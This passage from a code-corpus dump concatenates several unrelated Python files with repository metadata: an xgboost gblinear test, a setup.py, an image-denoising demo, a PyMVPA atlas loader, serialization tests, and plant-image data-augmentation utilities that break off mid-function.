i += n
return groups
return inner
| 34.34375 | 79 | 0.664847 |
2ea3e44dd42e146b8ad4b0d7c94df413e9dd7cc1 | 3,447 | py | Python | tests/python/test_linear.py | lfdmn/xgboost | 9150fdbd4d989767f7126c589f773649a594dbc3 | [
"Apache-2.0"
] | null | null | null | tests/python/test_linear.py | lfdmn/xgboost | 9150fdbd4d989767f7126c589f773649a594dbc3 | [
"Apache-2.0"
] | 1 | 2022-02-01T16:14:41.000Z | 2022-02-01T16:14:41.000Z | tests/python/test_linear.py | lfdmn/xgboost | 9150fdbd4d989767f7126c589f773649a594dbc3 | [
"Apache-2.0"
] | null | null | null | import testing as tm
from hypothesis import strategies, given, settings, note
import xgboost as xgb
parameter_strategy = strategies.fixed_dictionaries({
'booster': strategies.just('gblinear'),
'eta': strategies.floats(0.01, 0.25),
'tolerance': strategies.floats(1e-5, 1e-2),
'nthread': strategies.integers(1, 4),
})
coord_strategy = strategies.fixed_dictionaries({
'feature_selector': strategies.sampled_from(['cyclic', 'shuffle',
'greedy', 'thrifty']),
'top_k': strategies.integers(1, 10),
})
def train_result(param, dmat, num_rounds):
result = {}
xgb.train(param, dmat, num_rounds, [(dmat, 'train')], verbose_eval=False,
evals_result=result)
return result
class TestLinear:
@given(parameter_strategy, strategies.integers(10, 50),
tm.dataset_strategy, coord_strategy)
@settings(deadline=None, print_blob=True)
def test_coordinate(self, param, num_rounds, dataset, coord_param):
param['updater'] = 'coord_descent'
param.update(coord_param)
param = dataset.set_params(param)
result = train_result(param, dataset.get_dmat(), num_rounds)['train'][dataset.metric]
note(result)
assert tm.non_increasing(result, 5e-4)
# Loss is not guaranteed to always decrease because of regularisation parameters
# We test a weaker condition that the loss has not increased between the first and last
# iteration
@given(parameter_strategy, strategies.integers(10, 50),
tm.dataset_strategy, coord_strategy, strategies.floats(1e-5, 1.0),
strategies.floats(1e-5, 1.0))
@settings(deadline=None, print_blob=True)
def test_coordinate_regularised(self, param, num_rounds, dataset, coord_param, alpha, lambd):
param['updater'] = 'coord_descent'
param['alpha'] = alpha
param['lambda'] = lambd
param.update(coord_param)
param = dataset.set_params(param)
result = train_result(param, dataset.get_dmat(), num_rounds)['train'][dataset.metric]
note(result)
assert tm.non_increasing([result[0], result[-1]])
@given(parameter_strategy, strategies.integers(10, 50),
tm.dataset_strategy)
@settings(deadline=None, print_blob=True)
def test_shotgun(self, param, num_rounds, dataset):
param['updater'] = 'shotgun'
param = dataset.set_params(param)
result = train_result(param, dataset.get_dmat(), num_rounds)['train'][dataset.metric]
note(result)
# shotgun is non-deterministic, so we relax the test by only using first and last
# iteration.
if len(result) > 2:
sampled_result = (result[0], result[-1])
else:
sampled_result = result
assert tm.non_increasing(sampled_result)
@given(parameter_strategy, strategies.integers(10, 50),
tm.dataset_strategy, strategies.floats(1e-5, 1.0),
strategies.floats(1e-5, 1.0))
@settings(deadline=None, print_blob=True)
def test_shotgun_regularised(self, param, num_rounds, dataset, alpha, lambd):
param['updater'] = 'shotgun'
param['alpha'] = alpha
param['lambda'] = lambd
param = dataset.set_params(param)
result = train_result(param, dataset.get_dmat(), num_rounds)['train'][dataset.metric]
note(result)
assert tm.non_increasing([result[0], result[-1]])
| 41.53012 | 97 | 0.659994 |
57e6164f98fb4f53d2aa9e6e91f12266658b76fb | 1,137 | py | Python | setup.py | tumluliu/rap | 2a44b337379e32e7739aacd1425197c28adad9e9 | [
"MIT"
] | null | null | null | setup.py | tumluliu/rap | 2a44b337379e32e7739aacd1425197c28adad9e9 | [
"MIT"
] | null | null | null | setup.py | tumluliu/rap | 2a44b337379e32e7739aacd1425197c28adad9e9 | [
"MIT"
] | null | null | null | import re
from codecs import open
from setuptools import setup
version = ''
license = ''
title = ''
author = ''
contact = ''
with open('rap/__init__.py', 'r') as fd:
file_content = fd.read()
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
file_content, re.MULTILINE).group(1)
license = re.search(r'^__license__\s*=\s*[\'"]([^\'"]*)[\'"]',
file_content, re.MULTILINE).group(1)
title = re.search(r'^__title__\s*=\s*[\'"]([^\'"]*)[\'"]', file_content,
re.MULTILINE).group(1)
author = re.search(r'^__author__\s*=\s*[\'"]([^\'"]*)[\'"]', file_content,
re.MULTILINE).group(1)
contact = re.search(r'^__contact__\s*=\s*[\'"]([^\'"]*)[\'"]',
file_content, re.MULTILINE).group(1)
setup(
name=title,
version=version,
description="""Geospatial dataset exploration with Routers As Probes """,
author=author,
author_email=contact,
license=license,
packages=['rap'],
entry_points={
'console_scripts': [
'rapy=rap.rapy:main'
]
})
| 30.72973 | 78 | 0.525066 |
f75932eb992b566e7d07e4767d9068c74a653c1d | 4,891 | py | Python | codes/3_1.py | inspurer/ImageProcess | f826c36f3ae17bee5694c3f1748f9e5319a46fd9 | [
"MIT"
] | 1 | 2020-11-10T11:35:30.000Z | 2020-11-10T11:35:30.000Z | codes/3_1.py | inspurer/ImageProcess | f826c36f3ae17bee5694c3f1748f9e5319a46fd9 | [
"MIT"
] | null | null | null | codes/3_1.py | inspurer/ImageProcess | f826c36f3ae17bee5694c3f1748f9e5319a46fd9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# pc_type lenovo
# create_time: 2019/11/9 15:15
# file_name: 3_1.py
import cv2
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import random
# 设置中文字体和负号正常显示
plt.rcParams['font.sans-serif'] = ['SimHei'] # 指定默认字体
plt.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题
sns.set_context("paper") # 背景
sns.set_style('whitegrid') # 主题
sns.set(font='SimHei') # 解决Seaborn中文显示问题,这一句必须放在前两后面
def sp_noise(image,prob):
'''
添加椒盐噪声
prob:噪声比例
'''
output = np.zeros(image.shape,np.uint8)
thres = 1 - prob
for i in range(image.shape[0]):
for j in range(image.shape[1]):
rdn = random.random()
if rdn < prob:
output[i][j] = 0
elif rdn > thres:
output[i][j] = 255
else:
output[i][j] = image[i][j]
return output
def gauss_noise(image, mean=0, var=0.001):
'''
添加高斯噪声
mean : 均值 mean = 0 是高斯白噪声
var : 方差 方差越大,图像越模糊
'''
image = np.array(image / 255, dtype=float)
noise = np.random.normal(mean, var ** 0.5, image.shape)
out = image + noise
if out.min() < 0:
low_clip = -1.
else:
low_clip = 0.
# 把 out 的元素限制在 low_clip 和 1 之间
out = np.clip(out, low_clip, 1.0)
out = out*255
#cv.imshow("gasuss", out)
return out
from PIL import Image
# 解决 opencv 不能读取 gif
gif = cv2.VideoCapture('img/test3.gif')
ret,frame = gif.read()
img = Image.fromarray(frame)
# L : 灰度图 , RGB : RGB 彩色图
img = img.convert('L')
img = np.array(img)
sp_img = sp_noise(img,0.015)
gs_img = gauss_noise(img,var=0.02)
# 邻域平均法
def fspeical_average(image,kernel):
a = len(kernel)
kernel = kernel/(a**2)
step = a//2
h,w = image.shape[0],image.shape[1]
nh,nw = h+2*step,w+2*step
lbimg = np.zeros((nh,nw), np.float32)
tmpimg = np.zeros((nh,nw))
newimg = np.array(image)
tmpimg[step:nh - step, step:nw - step] = newimg[0:h, 0:w]
for y in range(step, nh - step):
for x in range(step, nw - step):
lbimg[y, x] = np.sum(kernel * tmpimg[y - step:y + step + 1, x - step:x + step + 1])
resultimg = np.array(lbimg[step:nh - step, step:nw - step], np.uint8)
return resultimg
# 中值滤波法
def fspeical_medium(image,a):
step = a // 2
h, w = image.shape[0], image.shape[1]
nh, nw = h + 2 * step, w + 2 * step
lbimg = np.zeros((nh, nw), np.float32)
tmpimg = np.zeros((nh, nw))
newimg = np.array(image)
tmpimg[step:nh - step, step:nw - step] = newimg[0:h, 0:w]
for y in range(step, nh - step):
for x in range(step, nw - step):
lbimg[y, x] = np.median(tmpimg[y - step:y + step + 1, x - step:x + step + 1])
resultimg = np.array(lbimg[step:nh - step, step:nw - step], np.uint8)
return resultimg
plt.figure()
plt.subplot(2,4,1)
plt.imshow(img,cmap='gray')
plt.title("原图")
plt.subplot(2,4,5)
plt.imshow(img,cmap='gray')
plt.title("原图")
plt.subplot(2,4,2)
plt.imshow(sp_img,cmap='gray')
plt.title("加椒盐噪声")
plt.subplot(2,4,3)
plt.imshow(fspeical_average(sp_img,kernel=np.array([[1,1,1],[1,1,1],[1,1,1]])),cmap='gray')
plt.title("邻域平均法去椒盐噪声(3x3)")
plt.subplot(2,4,4)
plt.imshow(fspeical_average(sp_img,kernel=np.array([[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])),cmap='gray')
plt.title("邻域平均法去椒盐噪声(5x5)")
plt.subplot(2,4,6)
plt.imshow(gs_img,cmap='gray')
plt.title("加高斯噪声")
plt.subplot(2,4,7)
plt.imshow(fspeical_average(gs_img,kernel=np.array([[1,1,1],[1,1,1],[1,1,1]])),cmap='gray')
plt.title("邻域平均法去高斯噪声(3x3)")
plt.subplot(2,4,8)
plt.imshow(fspeical_average(gs_img,kernel=np.array([[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])),cmap='gray')
plt.title("邻域平均法去高斯噪声(5x5)")
plt.figure()
plt.subplot(2,4,1)
plt.imshow(img,cmap='gray')
plt.title("原图")
plt.subplot(2,4,5)
plt.imshow(img,cmap='gray')
plt.title("原图")
plt.subplot(2,4,2)
plt.imshow(sp_img,cmap='gray')
plt.title("加椒盐噪声")
plt.subplot(2,4,3)
plt.imshow(cv2.medianBlur(sp_img,3),cmap='gray')
plt.title("中值滤波法去椒盐噪声(3x3)")
plt.subplot(2,4,4)
plt.imshow(cv2.medianBlur(sp_img,5),cmap='gray')
plt.title("中值滤波法去椒盐噪声(5x5)")
plt.subplot(2,4,6)
plt.imshow(gs_img,cmap='gray')
plt.title("加高斯噪声")
plt.subplot(2,4,7)
plt.imshow(fspeical_medium(gs_img,3),cmap='gray')
plt.title("中值滤波法去高斯噪声(3x3)")
plt.subplot(2,4,8)
plt.imshow(fspeical_medium(gs_img,5),cmap='gray')
plt.title("中值滤波法去高斯噪声(5x5)")
# for h in range(gs_img.shape[0]):
# for w in range(gs_img.shape[1]):
# if gs_img[h][w]<0:
# gs_img[h][w] = -gs_img[h][w]
# medianBlur 仅接收无符号整数类型元素
# gs_img = np.uint8(gs_img)
# print(gs_img)
# plt.subplot(2,4,7)
# print(sp_img,gs_img)
# plt.imshow(cv2.medianBlur(gs_img,3),cmap='gray')
# plt.title("中值滤波法去高斯噪声(3x3)")
# plt.subplot(2,4,8)
# plt.imshow(cv2.medianBlur(gs_img,5),cmap='gray')
# plt.title("中值滤波法去高斯噪声(5x5)")
plt.show()
| 28.436047 | 127 | 0.618074 |
1dea1511cf1c9b285abb0600be7448d703e83b22 | 4,151 | py | Python | mvpa2/atlases/warehouse.py | mortonne/PyMVPA | 98644c5cd9733edd39fac746ea7cf67398674645 | [
"MIT"
] | null | null | null | mvpa2/atlases/warehouse.py | mortonne/PyMVPA | 98644c5cd9733edd39fac746ea7cf67398674645 | [
"MIT"
] | null | null | null | mvpa2/atlases/warehouse.py | mortonne/PyMVPA | 98644c5cd9733edd39fac746ea7cf67398674645 | [
"MIT"
] | null | null | null | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the PyMVPA package for the
# copyright and license terms.
#
### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Collection of the known atlases"""
import os
from mvpa2.base import warning
from mvpa2.atlases.base import *
from mvpa2.atlases.fsl import *
from functools import reduce
__all__ = ["KNOWN_ATLAS_FAMILIES", "KNOWN_ATLASES", "Atlas"]
KNOWN_ATLAS_FAMILIES = {
"pymvpa": (
["talairach", "talairach-dist"],
r"/usr/share/rumba/atlases/data/%(name)s_atlas.xml",
),
"fsl": (
[
"HarvardOxford-Cortical",
"HarvardOxford-Subcortical",
"JHU-tracts",
"Juelich",
"MNI",
"Thalamus",
],
r"/usr/share/fsl/data/atlases/%(name)s.xml",
)
# XXX make use of FSLDIR
}
# map to go from the name to the path
KNOWN_ATLASES = dict(
reduce(
lambda x, y: x + [(yy, y[1]) for yy in y[0]],
list(KNOWN_ATLAS_FAMILIES.values()),
[],
)
)
def Atlas(filename=None, name=None, *args, **kwargs):
"""A convinience factory for the atlases"""
if filename is None:
if name is None:
raise ValueError(
"Please provide either path or name of the atlas to be used"
)
atlaspath = KNOWN_ATLASES[name]
filename = atlaspath % ({"name": name})
if not os.path.exists(filename):
raise IOError("File %s for atlas %s was not found" % (filename, name))
else:
if name is not None:
raise ValueError("Provide only filename or name")
try:
# Just to guestimate what atlas that is
tempAtlas = XMLBasedAtlas(
filename=filename, load_maps=False
) # , *args, **kwargs)
version = tempAtlas.version
atlas_source = None
for cls in [PyMVPAAtlas, FSLAtlas]:
if cls._check_version(version):
atlas_source = cls.source
break
if atlas_source is None:
if __debug__:
debug("ATL_", "Unknown atlas " + filename)
return tempAtlas
atlasTypes = {
"PyMVPA": {"Label": LabelsAtlas, "Reference": ReferencesAtlas},
"FSL": {
"Label": FSLLabelsAtlas,
"Probabalistic": FSLProbabilisticAtlas,
"Probabilistic": FSLProbabilisticAtlas,
},
}[atlas_source]
atlasType = tempAtlas.header.type.text
if atlasType in atlasTypes:
if __debug__:
debug("ATL_", "Creating %s Atlas" % atlasType)
return atlasTypes[atlasType](filename=filename, *args, **kwargs)
# return ReferencesAtlas(filename)
else:
warning(
"Unknown %s type '%s' of atlas in %s."
" Known are %s"
% (atlas_source, atlasType, filename, list(atlasTypes.keys())),
2,
)
return tempAtlas
except XMLAtlasException as e:
print("File %s is not a valid XML based atlas due to %s" % (filename, repr(e)))
raise e
if __name__ == "__main__":
from mvpa2.base import verbose
verbose.level = 10
for name in [
#'data/talairach_atlas.xml',
"/usr/share/fsl/data/atlases/HarvardOxford-Cortical.xml",
"/usr/share/fsl/data/atlases/HarvardOxford-Subcortical.xml",
]:
atlas = Atlas(name)
# print isinstance(atlas.atlas, objectify.ObjectifiedElement)
# print atlas.header.images.imagefile.get('offset')
# print atlas.label_voxel( (0, -7, 20) )
# print atlas[ 0, 0, 0 ]
print(atlas[-63, -12, 22])
# print atlas[ 0, -7, 20, [1,2,3] ]
# print atlas[ (0, -7, 20), 1:2 ]
# print atlas[ (0, -7, 20) ]
# print atlas[ (0, -7, 20), : ]
# print atlas.get_labels(0)
| 32.685039 | 87 | 0.537943 |
fd47c9a972887917f554171af4090d2d4f1fca7e | 5,090 | py | Python | src/codplayer/test/test_serialize.py | petli/codplayer | 172187b91662affd8e89f572c0db9be1c4257627 | [
"MIT"
] | 14 | 2015-04-27T20:40:46.000Z | 2019-02-01T09:22:02.000Z | src/codplayer/test/test_serialize.py | petli/codplayer | 172187b91662affd8e89f572c0db9be1c4257627 | [
"MIT"
] | 10 | 2015-01-05T18:11:28.000Z | 2018-09-03T08:42:50.000Z | src/codplayer/test/test_serialize.py | petli/codplayer | 172187b91662affd8e89f572c0db9be1c4257627 | [
"MIT"
] | 4 | 2017-03-03T16:59:39.000Z | 2019-11-08T11:15:06.000Z | # codplayer - test the serialize module
#
# Copyright 2013 Peter Liljenberg <peter.liljenberg@gmail.com>
#
# Distributed under an MIT license, please see LICENSE in the top dir.
import unittest
import types
from .. import serialize
class DummyObject(object):
pass
class FOO(object):
pass
class BAR(object):
pass
class Structure(serialize.Serializable):
MAPPING = (
serialize.Attr('number', int),
)
class TestPopulateObject(unittest.TestCase):
def test_missing_attr(self):
with self.assertRaises(serialize.LoadError):
serialize.populate_object(
{ 'foo': 'bar' },
DummyObject(),
[serialize.Attr('gazonk', int)]
)
def test_incorrect_type(self):
with self.assertRaises(serialize.LoadError):
serialize.populate_object(
{ 'foo': 'bar' },
DummyObject(),
[serialize.Attr('foo', int)]
)
def test_populate(self):
obj = DummyObject()
serialize.populate_object(
{ 'foo': 'bar',
'gazonk': 17,
'flag': True,
'ignored': None,
},
obj,
[serialize.Attr('gazonk', int),
serialize.Attr('foo', str),
serialize.Attr('flag', bool)]
)
self.assertEqual(obj.foo, 'bar')
self.assertEqual(obj.gazonk, 17)
self.assertIs(obj.flag, True)
def test_optional(self):
obj = DummyObject()
serialize.populate_object(
{ 'foo': 'bar',
'opt3': None, },
obj,
[serialize.Attr('foo', str),
serialize.Attr('opt1', int, optional = True),
serialize.Attr('opt2', int, optional = True, default = 17),
serialize.Attr('opt3', int, optional = True)]
)
self.assertEqual(obj.foo, 'bar')
self.assertTrue(serialize.attr_populated(obj, 'foo'))
self.assertEqual(obj.opt1, None)
self.assertFalse(serialize.attr_populated(obj, 'opt1'))
self.assertEqual(obj.opt2, 17)
self.assertFalse(serialize.attr_populated(obj, 'opt2'))
self.assertEqual(obj.opt3, None)
self.assertTrue(serialize.attr_populated(obj, 'opt3'))
def test_unicode_to_str(self):
obj = DummyObject()
serialize.populate_object(
{ 'foo': u'bar' },
obj,
[serialize.Attr('foo', str)]
)
self.assertTrue(isinstance(obj.foo, str))
self.assertEqual(obj.foo, 'bar')
def test_unicode(self):
obj = DummyObject()
serialize.populate_object(
{ 'foo': u'bar\u20ac' },
obj,
[serialize.Attr('foo', serialize.str_unicode)]
)
self.assertTrue(isinstance(obj.foo, serialize.str_unicode))
self.assertEqual(obj.foo, u'bar\u20ac')
def test_bad_enum(self):
with self.assertRaises(serialize.LoadError):
serialize.populate_object(
{ 'foo': 'GAZONK' },
DummyObject(),
[serialize.Attr('foo', enum = (FOO, BAR))]
)
def test_enum(self):
obj = DummyObject()
serialize.populate_object(
{ 'foo': 'FOO',
'bar': 'BAR' },
obj,
[serialize.Attr('foo', enum = (FOO, BAR)),
serialize.Attr('bar', enum = (FOO, BAR))]
)
self.assertIs(obj.foo, FOO)
self.assertIs(obj.bar, BAR)
def test_structure(self):
obj = DummyObject()
serialize.populate_object(
{ 'value': { 'number': 17 } },
obj,
[serialize.Attr('value', Structure)]
)
self.assertIsInstance(obj.value, Structure)
self.assertEqual(obj.value.number, 17)
def test_bad_structure(self):
with self.assertRaises(serialize.LoadError):
serialize.populate_object(
{ 'value': 17 },
DummyObject(),
[serialize.Attr('value', Structure)]
)
def test_list(self):
obj = DummyObject()
serialize.populate_object(
{ 'values': [17, 42, 39] },
obj,
[serialize.Attr('values', list_type = int)]
)
self.assertIsInstance(obj.values, list)
self.assertListEqual(obj.values, [17, 42, 39])
def test_bad_list(self):
with self.assertRaises(serialize.LoadError):
serialize.populate_object(
{ 'values': 17 },
DummyObject(),
[serialize.Attr('values', list_type = int)]
)
def test_bad_list_value(self):
with self.assertRaises(serialize.LoadError):
serialize.populate_object(
{ 'values': ['foo'] },
DummyObject(),
[serialize.Attr('values', list_type = int)]
)
| 26.510417 | 72 | 0.524361 |
9ebf6d1ccc37f6933a805fa7fdf7c7147e44e461 | 14,648 | py | Python | plant_classification/data_utils.py | laramaktub/cookie_plant_classification | 3fba329b19c3599f3f7334d56003927dd05ff42c | [
"MIT"
] | null | null | null | plant_classification/data_utils.py | laramaktub/cookie_plant_classification | 3fba329b19c3599f3f7334d56003927dd05ff42c | [
"MIT"
] | null | null | null | plant_classification/data_utils.py | laramaktub/cookie_plant_classification | 3fba329b19c3599f3f7334d56003927dd05ff42c | [
"MIT"
] | 1 | 2018-11-30T20:07:09.000Z | 2018-11-30T20:07:09.000Z | # -*- coding: utf-8 -*-
"""
Miscellanous functions manage data in image recognition.
network.
Author: Ignacio Heredia
Date: September 2016
"""
import os
import sys
from io import BytesIO
import threading
import Queue
import numpy as np
from PIL import Image, ImageEnhance
import requests
def data_splits(im_dir='/media/ignacio/Datos/plant_net/images_ori', tag=False):
"""
Load the training and validation arrays from the train.txt and val.txt files.
Lines of txt files have the following format:
'relative_path_to_image' 'image_tag'[optional] 'image_label_number'
Parameters
----------
im_dir : str
Absolute path to the image folder.
tag : bool
Presence or absence of tag in txt files.
Returns
-------
X_train, X_val : array of strs
First colunm: Contains 'absolute_path_to_file' to images.
Second column [optional]: Contains tag of image
y_train, y_val : array of int32
Image label number
metadata : array of strs
Label names array.
tags : array of strs, None
Tags names array for the training images.
"""
homedir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
splits_dir = os.path.join(homedir, 'data', 'data_splits')
print("Loading data...")
file_list = os.listdir(splits_dir)
# Metadata labels
metadata = np.genfromtxt(os.path.join(splits_dir, 'synsets.txt'), dtype='str', delimiter='/n')
# Training splits
train = np.genfromtxt(os.path.join(splits_dir, 'train.txt'), dtype='str', delimiter=' ')
X_train = np.array([os.path.join(im_dir, i) for i in train[:, 0]])
y_train = train[:, 1].astype(np.int32)
if 'tags.txt' in file_list:
tags = np.genfromtxt(os.path.join(splits_dir, 'tags.txt'), dtype='str', delimiter=' ')
assert len(X_train) == len(tags), 'You must assign a tag to EVERY training image'
else:
tags = None
# Validation splits
if 'val.txt' in file_list:
val = np.genfromtxt(os.path.join(splits_dir, 'val.txt'), dtype='str', delimiter=' ')
y_val = val[:, -1].astype(np.int32)
X_val = np.array([os.path.join(im_dir, i) for i in val[:, 0]])
else:
print 'Training with no validation data.'
X_val, y_val = None, None
return X_train, y_train, X_val, y_val, metadata, tags
def data_augmentation(im_list, mode='standard', tags=None, params=None, im_size=224,
filemode='local', mean_RGB=None):
"""
Perform data augmentation on some image list using PIL.
Parameters
----------
im_list : array of strings
Array where the first column is image_path (or image_url). Optionally
a second column can be the tags of the image.
Shape (N,) or (N,2)
tags : array of strings, None
If existing, you can the manually modify the data_augmentation function
(by adding an additional condition to the if, like tags[i]=='fruit')
to choose which transformations are to be performed to each tag.
params : dict or None
Mandatory keys:
- mirror (bool): allow 50% random mirroring.
- rotation (bool): allow rotation of [0, 90, 180, 270] degrees.
- stretch ([0,1] float): randomly stretch image.
- crop ([0,1] float): randomly take an image crop.
- zoom ([0,1] float): random zoom applied to crop_size.
--> Therefore the effective crop size at each iteration will be a
random number between 1 and crop*(1-zoom). For example:
* crop=1, zoom=0: no crop of the image
* crop=1, zoom=0.1: random crop of random size between 100% image and 90% of the image
* crop=0.9, zoom=0.1: random crop of random size between 90% image and 80% of the image
* crop=0.9, zoom=0: random crop of always 90% of the image
Image size refers to the size of the shortest side.
- pixel_noise (bool): allow different pixel transformations like gaussian noise,
brightness, color jittering, contrast and sharpness modification.
mode : {'standard', 'minimal', 'test', None}
We overwrite the params dict with some defaults augmentation parameters
- 'minimal': no data augmentation, just resizing
- 'standard': tipical parameters for data augmentation during training
- 'test': minimized data augmentation for validation/testing
- None: we do not overwrite the params dict variable
im_size : int
Final image size to feed the net's input (eg. 224 for Resnet).
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
mean_RGB : array, None
Mean RGB values for your dataset. If not provided, we use some default values.
Returns
-------
Array of shape (N,3,im_size,im_size) containing the augmented images.
"""
if mean_RGB is None:
mean_RGB = np.array([107.59348955, 112.1047813, 80.9982362])
else:
mean_RGB = np.array(mean_RGB)
if mode == 'minimal':
params = {'mirror':False, 'rotation':False, 'stretch':False, 'crop':False, 'pixel_noise':False}
if mode == 'standard':
params = {'mirror':True, 'rotation':True, 'stretch':0.3, 'crop':1., 'zoom':0.3, 'pixel_noise':False}
if mode == 'test':
params = {'mirror':True, 'rotation':True, 'stretch':0.1, 'crop':.9, 'zoom':0.1, 'pixel_noise':False}
batch = []
for i, filename in enumerate(im_list):
if filemode == 'local':
im = Image.open(filename)
im = im.convert('RGB')
elif filemode == 'url':
filename = BytesIO(requests.get(filename).content)
im = Image.open(filename)
im = im.convert('RGB')
if params['stretch']:
stretch = params['stretch']
stretch_factor = np.random.uniform(low=1.-stretch/2, high=1.+stretch/2, size=2)
im = im.resize((im.size * stretch_factor).astype(int))
if params['crop']:
effective_zoom = np.random.rand() * params['zoom']
crop = params['crop'] - effective_zoom
ly, lx = im.size
crop_size = crop * min([ly, lx])
rand_x = np.random.randint(low=0, high=lx-crop_size + 1)
rand_y = np.random.randint(low=0, high=ly-crop_size + 1)
min_yx = np.array([rand_y, rand_x])
max_yx = min_yx + crop_size #square crop
im = im.crop(np.concatenate((min_yx, max_yx)))
if params['mirror']:
if np.random.random() > 0.5:
im = im.transpose(Image.FLIP_LEFT_RIGHT)
if np.random.random() > 0.5:
im = im.transpose(Image.FLIP_TOP_BOTTOM)
if params['rotation']:
rot = np.random.choice([0, 90, 180, 270])
if rot == 90:
im = im.transpose(Image.ROTATE_90)
if rot == 180:
im = im.transpose(Image.ROTATE_180)
if rot == 270:
im = im.transpose(Image.ROTATE_270)
if params['pixel_noise']:
#not used by default as it does not seem to improve much the performance,
#but more than DOUBLES the data augmentation processing time.
# Color
color_factor = np.random.normal(1, 0.3) #1: original
color_factor = np.clip(color_factor, 0., 2.)
im = ImageEnhance.Color(im).enhance(color_factor)
# Brightness
brightness_factor = np.random.normal(1, 0.2) #1: original
brightness_factor = np.clip(brightness_factor, 0.5, 1.5)
im = ImageEnhance.Brightness(im).enhance(brightness_factor)
# Contrast
contrast_factor = np.random.normal(1, 0.2) #1: original
contrast_factor = np.clip(contrast_factor, 0.5, 1.5)
im = ImageEnhance.Contrast(im).enhance(contrast_factor)
# Sharpness
sharpness_factor = np.random.normal(1, 0.4) #1: original
sharpness_factor = np.clip(sharpness_factor, 0., 1.)
im = ImageEnhance.Sharpness(im).enhance(sharpness_factor)
# # Gaussian Noise #severely deteriorates learning
# im = np.array(im)
# noise = np.random.normal(0, 15, im.shape)
# noisy_image = np.clip(im + noise, 0, 255).astype(np.uint8)
# im = Image.fromarray(noisy_image)
im = im.resize((im_size, im_size))
batch.append(np.array(im)) # shape (N, 224, 224, 3)
batch = np.array(batch) - mean_RGB[None, None, None, :] # mean centering
batch = batch.transpose(0, 3, 1, 2) # shape(N, 3, 224, 224)
batch = batch[:, ::-1, :, :] # switch from RGB to BGR
return batch.astype(np.float32)
#def iterate_minibatches(inputs, targets, batchsize, shuffle=False):
# """
# Returns generator of batches of inputs and targets.
# """
# assert len(inputs) == len(targets)
# assert len(inputs) >= batchsize
# if shuffle:
# indices = np.arange(len(inputs))
# np.random.shuffle(indices)
# for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):
# if shuffle:
# excerpt = indices[start_idx:start_idx + batchsize]
# else:
# excerpt = slice(start_idx, start_idx + batchsize)
# if targets.shape < 2: targets = targets.reshape(-1,1)
# yield inputs[excerpt], targets[excerpt]
def buffered_gen_threaded(source_gen, buffer_size=2):
"""
Generator that runs a slow source generator in a separate thread. Beware of the GIL!
buffer_size: the maximal number of items to pre-generate (length of the buffer)
Author: Benanne (github-kaggle/benanne/ndsb)
"""
if buffer_size < 2:
raise RuntimeError("Minimal buffer size is 2!")
buffer = Queue.Queue(maxsize=buffer_size - 1)
# the effective buffer size is one less, because the generation process
# will generate one extra element and block until there is room in the buffer.
def _buffered_generation_thread(source_gen, buffer):
for data in source_gen:
buffer.put(data, block=True)
buffer.put(None) # sentinel: signal the end of the iterator
thread = threading.Thread(target=_buffered_generation_thread, args=(source_gen, buffer))
thread.daemon = True
thread.start()
for data in iter(buffer.get, None):
yield data
def iterate_minibatches(inputs, targets, batchsize, shuffle=False, **augmentation_params):
"""
Returns generator of batches of inputs and targets via buffer.
Therefore we perform dataaugmnetaion for the next batch on CPU while the GPU is
computing the current batch.
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batchsize
if shuffle:
indices = np.arange(len(inputs))
np.random.shuffle(indices)
def gen(inputs, targets, batchsize, **augmentation_params):
for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):
if shuffle:
excerpt = indices[start_idx:start_idx + batchsize]
else:
excerpt = slice(start_idx, start_idx + batchsize)
if targets.shape < 2:
targets = targets.reshape(-1, 1)
X, y = data_augmentation(inputs[excerpt], **augmentation_params), targets[excerpt]
yield X, y
return buffered_gen_threaded(gen(inputs, targets, batchsize, **augmentation_params))
def standard_tencrop_batch(filename, filemode='local', crop_prop=0.8, im_size=224):
"""
Returns an ordered ten crop batch of images from an original image (corners,
center + mirrors).
Parameters
----------
filename : str
Image path
crop_size : float
Size of the crop with respect to the original image.
im_size : int
Size of the output image to feed the net.
filemode : str
filemode : {'local','url'}
* 'local' -- filename is absolute path in local disk.
* 'url' -- filename is internet url.
Returns
-------
Array of shape (10,3,im_size,im_size) containing the augmented images.
"""
batch = []
mean_RGB = np.array([107.59348955, 112.1047813, 80.9982362])
if filemode == 'local':
im = Image.open(filename)
elif filemode == 'url':
filename = BytesIO(requests.get(filename).content)
im = Image.open(filename)
im = im.convert('RGB')
min_side = min(im.size)
im = im.resize((min_side, min_side)) # resize to shorter border
h, w = min_side, min_side # height, width (square)
crop_size = int(crop_prop * min_side)
# Crops
c1 = im.crop((0, 0, crop_size, crop_size)) # top-left
c2 = im.crop((0, h-crop_size, crop_size, h)) # bottom-left
c3 = im.crop((w-crop_size, 0, w, crop_size)) # top-right
c4 = im.crop((w-crop_size, h-crop_size, w, h)) # bottom-right
c5 = im.crop(((w-crop_size)/2, (h-crop_size)/2,
(w+crop_size)/2, (h+crop_size)/2)) # center
# Save crop and its mirror
for image in [c1, c2, c3, c4, c5]:
image = image.resize((im_size, im_size))
batch.append(np.array(image))
batch.append(np.array(image.transpose(Image.FLIP_LEFT_RIGHT)))
batch = (np.array(batch) - mean_RGB) # mean centering
batch = batch.transpose(0, 3, 1, 2) # shape(10, 3, 224, 224)
batch = batch[:, ::-1, :, :] # switch from RGB to BGR
return batch.astype(np.float32)
def meanRGB(im_list, verbose=False):
"""
Returns the mean and std RGB values for the whole dataset.
For example in the plantnet dataset we have:
mean_RGB = np.array([ 107.59348955, 112.1047813 , 80.9982362 ])
std_RGB = np.array([ 52.78326119, 50.56163087, 50.86486131])
